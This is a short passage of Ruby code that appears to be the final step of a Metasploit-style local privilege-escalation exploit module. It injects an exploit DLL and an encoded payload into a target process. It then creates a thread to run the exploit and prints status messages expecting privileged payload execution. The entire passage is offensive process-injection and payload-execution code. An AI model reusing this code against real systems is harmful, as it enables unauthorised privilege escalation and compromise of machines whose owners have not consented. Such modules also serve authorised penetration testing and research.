print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end